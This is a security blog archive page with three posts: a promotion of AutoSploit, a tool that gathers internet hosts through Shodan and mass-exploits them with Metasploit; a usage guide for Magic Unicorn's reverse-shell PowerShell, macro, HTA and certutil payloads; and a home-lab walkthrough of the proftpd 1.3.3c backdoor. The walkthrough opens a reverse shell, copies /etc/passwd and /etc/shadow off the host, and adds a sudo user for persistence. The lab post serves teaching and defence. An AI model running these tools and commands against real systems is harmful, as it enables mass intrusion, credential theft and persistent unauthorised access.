Exploit Archives - Tech Chronicles

AutoSploit: Automated Mass Exploiter

Majordomo — Fri, 25 Jul 2025 20:43:36 +0000

AutoSploit is a powerful hacking tool that has the ability to automate exploitation operations on remote hosts. This tool enables you to perform mass exploitations on the system being targeted by utilizing the services offered by Shodan, Censys, Zoomeye and Metasploit. This tool is developed using Python.

Autosploit: Advanced Remote Host Mass Exploitation

With this tool, you can easily launch an attack on a remote host within a fairly short time. This is made possible due to the availability of Shodan, a powerful search engine that allows you to automatically fish out targets that are connected to a particular network service. Alternatively, you can also use target seeking tools such as Zoomeye and Censys to search out intended targets.

Apart from the automated host searching and collection, AutoSploit also gives you the option of creating your own customized target list. With this option in place, you can effectively launch attack-intended searches on hosts of your choice by manually adding them to your list.

Metasploit Modules and How They Work Together

The available powerful Metasploit modules are responsible for handling the rest of the work after the targets have been collected. By default, Metasploit comes with a long list of attack modules but you can manually add other modules of your liking to make the tool more powerful. The module deployed will depend on the platform search query that was used when an attack was launched. The Metasploit modules can help a pentester to gain access to services such as Meterpreter sessions and also be able to make remote code executions and many other attacks.

The combination of Shodan and Metasploit makes it very easy to use autosploit especially since the whole process is automated. The inclusion of Metasploit makes autosploit very effective tool when it comes to launching attacks on Apache-based projects.

AutoSploit Features:

Automated Target Collection
Customized Target List (allows you to add your own list of targets)
Metasploit Modules
Custom user-agent
Mass exploitations

Supported Platforms:

Linux
OS X (must be within virtual environments to properly function)

Dependencies:

This tool relies on the below Python 2.7 modules:

requests
psutil

The required dependencies should all be in place after performing an installation with the recommended method, but you can easily install them using pip:

$ pip install -r requirements.txt

Alternatively:

$ pip install requests psutil

Autosploit Install

Install AutoSploit via Docker Compose:

Clone the repo:

$ git clone https://github.com/NullArray/AutoSploit.git

Navigate to the Autosploit directory and run:

$ cd Autosploit/Docker
$ docker-compose run --rm autosploit

Install AutoSploit on Linux (via cloning)

Clone:

$ git clone https://github.com/NullArray/AutoSploit

Navigate to the AutoSploit directory, make the install script executable and install:

$ cd AutoSploit
$ chmod +x install.sh
$ ./install.sh

Usage

To start AutoSploit run:

$ python autosploit.py

This will take you to the available user options that you can choose from.

usage: python autosploit.py -[c|z|s|a] -[q] QUERY
                            [-C] WORKSPACE LHOST LPORT [-e] [--whitewash] PATH
                            [--ruby-exec] [--msf-path] PATH [-E] EXPLOIT-FILE-PATH
                            [--rand-agent] [--proxy] PROTO://IP:PORT [-P] AGENT

optional arguments:
  -h, --help            show this help message and exit

search engines:
  possible search engines to use

  -c, --censys          use censys.io as the search engine to gather hosts
  -z, --zoomeye         use zoomeye.org as the search engine to gather hosts
  -s, --shodan          use shodan.io as the search engine to gather hosts
  -a, --all             search all available search engines to gather hosts

requests:
  arguments to edit your requests

  --proxy PROTO://IP:PORT
                        run behind a proxy while performing the searches
  --random-agent        use a random HTTP User-Agent header
  -P USER-AGENT, --personal-agent USER-AGENT
                        pass a personal User-Agent to use for HTTP requests
  -q QUERY, --query QUERY
                        pass your search query

exploits:
  arguments to edit your exploits

  -E PATH, --exploit-file PATH
                        provide a text file to convert into JSON and save for
                        later use
  -C WORKSPACE LHOST LPORT, --config WORKSPACE LHOST LPORT
                        set the configuration for MSF (IE -C default 127.0.0.1
                        8080)
  -e, --exploit         start exploiting the already gathered hosts

misc arguments:
  arguments that don't fit anywhere else

  --ruby-exec           if you need to run the Ruby executable with MSF use
                        this
  --msf-path MSF-PATH   pass the path to your framework if it is not in your
                        ENV PATH
  --whitelist PATH      only exploit hosts listed in the whitelist file

Documentation

Download

The post AutoSploit: Automated Mass Exploiter appeared first on Tech Chronicles.

PowerShell Downgrade Attack – Magic Unicorn

Majordomo — Fri, 24 Nov 2023 00:21:44 +0000

Introduction

Magic Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. This tool is based on Matthew Graeber’s PowerShell attacks and the PowerShell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.

PowerShell Downgrade Attack: Magic Unicorn

Usage is very simple. You just need to make sure you’ve installed Metasploit in the right path and run the Magic Unicorn. Unicorn will automatically generate a powershell command. Copy and paste the powershell code into a command line window or through a payload delivery system:

root@kali:~/Desktop# python unicorn.py

Magic Unicorn Supports:

Metasploit;
Cobalt Strike;
Your own shellcode;

root@kali:~/Desktop# python unicorn.py
                                                         
                                                         ,/
                                                        //
                                                      ,//
                                          ___   /|   |//
                                      `__/\_ --(/|___/-/
                                   \|\_-\___ __-_`- /-/ \.
                                  |\_-___,-\_____--/_)' ) \
                                   \ -_ /     __ \( `( __`\|
                                   `\__|      |\)\ ) /(/|
           ,._____.,            ',--//-|      \  |  '   /
          /     __. \,          / /,---|       \       /
         / /    _. \  \        `/`_/ _,'        |     |
        |  | ( (  \   |      ,/\'__/'/          |     |
        |  \  \`--, `_/_------______/           \(   )/
        | | \  \_. \,                            \___/\
        | |  \_   \  \                                 \
        \ \    \_ \   \   /                             \
         \ \  \._  \__ \_|       |                       \
          \ \___  \      \       |                        \
           \__ \__ \  \_ |       \                         |
           |  \_____ \  ____      |                        |
           | \  \__ ---' .__\     |        |               |
           \  \__ ---   /   )     |        \              /
            \   \____/ / ()(      \          `---_       /|
             \__________/(,--__    \_________.    |    ./ |
               |     \ \  `---_\--,           \   \_,./   |
               |      \  \_ ` \    /`---_______-\   \\    /
                \      \.___,`|   /              \   \\   \
                 \     |  \_ \|   \              (   |:    |
                  \    \      \    |             /  / |    ;
                   \    \      \    \          ( `_'   \  |
                    \.   \      \.   \          `__/   |  |
                      \   \       \.  \                |  |
                       \   \        \  \               (  )
                        \   |        \  |              |  |
                         |  \         \ \              I  `
                         ( __;        ( _;            ('-_';
                         |___\        \___:            \___:

aHR0cHM6Ly93d3cuYmluYXJ5ZGVmZW5zZS5jb20vd3AtY29udGVudC91cGxvYWRzLzIwMTcvMDUvS2VlcE1hdHRIYXBweS5qcGc=

                
-------------------- Magic Unicorn Attack Vector -----------------------------

Native x86 powershell injection attacks on any Windows platform.
Written by: Dave Kennedy at TrustedSec (https://www.trustedsec.com)
Twitter: @TrustedSec, @HackingDave
Credits: Matthew Graeber, Justin Elze, Chris Gates

Happy Magic Unicorns.

Magic Unicorn allows native x86 powershell injection attacks on any Windows platform.

Usage:

python unicorn.py payload reverse_ipaddr port

Attack Options:

PowerShell Attack Instructions
Macro Attack Instructions
HTA Attack Instructions
Cerutil Attack Instractions
Custom PSI Attack Instructions

PowerShell Attack

After you run the following command it generates two files powershell_attack.txt and unicorn.rc. The text file contains all of the code needed in order to inject the PowerShell attack into memory.

python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443

There are plenty scenarios where you can use this attack at. Simply paste the powershell_attack.txt command in any command prompt window and it will give a shell back to you.

Note: In order to capture the attack, you’ll need to enable the listener.

You can use .rc file with Metasploit to quickly open up listener on the port you’ve specified.

Macro Attack

python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443 macro

Go to File->Properties->Ribbons, and select Developer. Now, you’ll have a developer tab. Create a new macro, call it Auto_Open and paste the generated code into that. This will automatically run.

Note: When copying and pasting the excel, if there are additional spaces that are added you need to remove these after each of the powershell code sections under variable “x” or a syntax error will happen!

HTA Attack

python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443 hta

The HTA attack will automatically generate two files. index.html tells the browser to use launcher.hta which contains the malicious powershell injection code. All files will be exported to the hta_access/ folder. Three main files:

index.html
launcher.hta
unicorn.rc

To lunch the listener for Metasploit, run:

msfconsole -r unicorn.rc

Cerutil Attack

python unicorn.py  crt

The Cerutil attack allows you to take a binary file, move it into a base64 format and use certutil on the victim machine to convert it back to a binary for you. It allows you to transfer a binary to the victim machine through a fake certificate file. To get the base64 output, just place an executable in the path of unicorn and run the following:

python unicorn.py  crt

Files will be stored in decode_attack/ folder.

Custom PSI Attack

Custom PS1 Examples:

python unicorn.py harmless.ps1
python unicorn.py myfile.ps1 macro
python unicorn.py muahahaha.ps1 macro 500

This attack method allows you to convert any PowerShell file (.ps1) into an encoded command or macro.

Other:

DDE Office COM Attack
Import Cobalt Strike Beacon
Custom Shellcode Generation Method
SettingContent-ms Extension Method

For more details and instructions go to Unicorn GitHub Repository page.

The post PowerShell Downgrade Attack – Magic Unicorn appeared first on Tech Chronicles.

Exploiting the proftpd Linux Server

Majordomo — Mon, 24 Jul 2023 22:21:29 +0000

Computer systems get attacked daily. Ransomware, malware, stolen credentials, video game makers’ source code gets leaked, and money drained from users’ accounts dominate our news feeds. But how do hackers gain initial access to compromise a system? Let’s take a look at how a breach could happen.

Don’t get too excited. This Behind the Scenes (BTS) walkthrough is using an old, patched, well-documented vulnerability that was fixed shortly after it was discovered, but it serves as a great example showing how Linux servers are exploited if you don’t keep them patched and up-to-date.

We’ll go through the steps threat actors use to infiltrate a system:

Reconnaissance
Scanning
Obtaining Access
Exfilitrating data
Maintaining Persistence
Pivoting

Lab Environment

The local home lab provides everything we need for this walkthrough.

Vulnerable Linux Machine – Ubuntu 16.04
- proftpd 1.3.3c
- Apache HTTP
- OpenSSH
Attacking Machine – Ubuntu Server 22.04
- Nmap
- Metasploit

These tools are widely used by penetration testers, network administrators, and threat actors alike. The first tool is Nmap, short for Network Mapper. For network admins, Nmap helps to find networked computers, discover open ports, available services, and detect known vulnerabilities on their network. Once a list of services is discovered, they can be exploited.

Scanning with Nmap

This is part of the reconnaissance or scanning phase where the threat actor wants to learn as much about the target system as they can. Because this is a demonstration we are not going to be quiet about our attack and will do nothing to conceal our intentions. We will use -sV option that tells us the current version of any services that are running. This is a noisy attack that should be picked up by most intrusion detection systems or SIEMs.

$ nmap -sV 10.10.10.172

” alt=”” aria-hidden=”true” />

The results from this command reveal a lot about our target system. Each open port is vulnerable to a potential attack. In our simulated attack, we are going to concentrate on the ftp service running the proftpd 1.3.3c software on Port 21.

Port	Protocol	State	Service	Version
21	tcp	open	ftp	proftpd 1.3.3c
22	tcp	open	ssh	OpenSSH 7.2p2
80	tcp	open	http	Apache 2.4.18

The proftpd 1.3.3c software was patched over 10 years ago but serves as a good example of how a vulnerable piece of software can be exploited. It is highly unlikely to still be running as an unpatched service.

Researching Vulnerabilities

We could use Google to learn more about the vulnerabilities in the proftpd 1.3.3c server, or we can use the next tool in our toolbox, Metasploit, and use its built-in database to find known vulnerabilities.

Metasploit is an open-source penetration testing framework that helps network administrators, and security professionals discover vulnerabilities in their systems before exploitation by hackers. Complete with various tools, libraries, user interfaces, and modules, Metasploit allows a user to research, configure a payload, point it at a target, and launch an attack. Metasploit’s extensive database contains hundreds of exploits and payloads. Unfortunately, Metasploit is also widely used by threat actors.

Launching Metasploit

Find installation instructions for Metasploit in the documentation and start the Metasploit framework as root with the following command.

$ sudo msfconsole

” alt=”” aria-hidden=”true” />

Search the Database for Known Exploits

Metasploit comes with an extensive database and technical details of over 180,000 vulnerabilites and 4000 exploits. These are all searchable with the search command from the Metasploit command line. We are going to use this database to find proftpd 1.3.3c vulnerabilities and known exploits.

msf6> search proftpd 1.3.3c

” alt=”” aria-hidden=”true” />

The results of the search command reveal that there is a backdoor command execution exploit. This is what we are going to use to gain access to the Linux server.

Gaining System Access

Let’s begin initial access to the server by configuring our attack by typing use exploit/unix/ftp/proftpd_133c_backdoor or simply the module ID number, use 0.

msf6 > use exploit/unix/ftp/proftpd_133c_backdoor

” alt=”” aria-hidden=”true” />

Use the show payloads command to display the payloads available for the proftpd_133c_backdoor module.

msf6 exploit(unix/ftp/proftpd_133c_backdoor) > show payloads

” alt=”” aria-hidden=”true” />

From the available payloads for the proftpd_133c_backdoor exploit, we are interested in Option 5, the payload/cmd/unix/reverse_perl command. Set the option using the payload number or the full command as follows:

msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set PAYLOAD cmd/unix/reverse_perl

” alt=”” aria-hidden=”true” />

Now we need to make some site-specific configuration settings. The first is the IP address of the target machine. Set the remote host IP address with the RHOSTS command. This is the same IP address we used during our Nmap scan earlier and the machine that is running the proftpd_1.3.3c server.

msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set RHOSTS 10.10.10.172

” alt=”” aria-hidden=”true” />

The local IP address is the computer that we are using for this attack. In our case, the LHOST is 10.10.10.171.

msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set LHOST 10.10.10.171

” alt=”” aria-hidden=”true” />

The Metasploit configuration is complete. Run the exploit with the exploit command.

msf6 exploit(unix/ftp/proftpd_133c_backdoor) > exploit

” alt=”” aria-hidden=”true” />

This exploit takes a few seconds to run. When you see ‘Command shell session 1 opened’ you can issue Linux commands by typing a command name. In our example, entering the whoami command displays the current user, which is root. This is a big deal! Root is the superuser account in UNIX, has administrative purposes, and typically has the highest access rights on the system.

” alt=”” aria-hidden=”true” />

At this point, the system is compromised and you can do whatever you want.

Gaining a Shell

To have any real fun on our compromised system we are going to want a full Linux shell. The following python command spawns a bash shell.

python3 -c 'import pty; pty.spawn("/bin/bash")'

” alt=”” aria-hidden=”true” />

Once we have a proper shell we can move through the system as root, having full access to the Linux environment. This is where the system is most vulnerable. As root we can install rootkits, malware, ransomware, and exfiltrate data.

Data Exfiltration

Data exfiltration is when a threat actor performs the unauthorized copying, transfer, or retrieval of data from a computer or server. As root, we have full access to the computer and can do anything we want including data exfiltration.

The Linux /etc/password file contains a list of system users, combined with the /etc/shadow file which contains encrypted passwords. Together these two files can be hacked to reveal username/password combinations for lateral movement through the network.

Again, we don’t really care about protecting our identity or our intentions (a SIEM would flag this immediately) so we are going to use scp (secure copy) to copy the password and shadow files to our remote server.

” alt=”” aria-hidden=”true” />

And /etc/shadow

” alt=”” aria-hidden=”true” />

We exfiltrated /etc/passwd and /etc/shadow to our local machine. There is no reason that we could not also exfiltrate databases, customer information, stored credit cards, or company-sensitive information out of the network to a remote location as we did with the password files.

Usernames and Passwords

Cracking the hashed passwords is beyond the scope of this walkthrough, but if you can crack the passwords, an attacker can use the same credentials to pivot to other machines across the network. John the Ripper and Hashcat are two well-known password cracking tools that can quickly reveal username/password combinations.

Maintaining Persistence

Persistence in cybersecurity occurs when a threat actor discreetly maintains long-term access to systems despite disruptions such as restarts or changed credentials. As root user, we can perform any administrative task we want, including adding users. One of the ways to maintain persistence is by adding a new user so the threat actor can gain access at a later time. Let’s add a new user.

root@vtsec:/# adduser badguy

” alt=”” aria-hidden=”true” />

And give them superuser access.

root@vtsec:/# usermod -aG sudo badguy

” alt=”” aria-hidden=”true” />

In the Sophos Active Adversary Playbook for 2021, “The median time that attackers were able to remain in the target network before detection – dwell time – was 11 days. This provides attackers with approximately 264 hours for malicious activity, such as lateral movement, reconnaissance, credential dumping, data exfiltration, and more.” Becoming a user of the system is one of the ways they can maintain persistence during this dwell time.

How to Protect Your Network

This type of attack would be caught by Antivirus (AV), Data Loss Prevention (DLP), and other SIEM solutions to control intrusions and data exfiltration. These are all basic cyber security tools that are part of a company’s overall security strategy that focuses on detecting and preventing the loss, leakage, or misuse of data through breaches, exfiltration, and unauthorized use.

Although it’s unlikely to find the proftpd 1.3.3c vulnerability because it was patched a long time ago, protecting your servers from this type of attack is the first step to protecting them. Update your software and perform routine patch management for all of your services.

The post Exploiting the proftpd Linux Server appeared first on Tech Chronicles.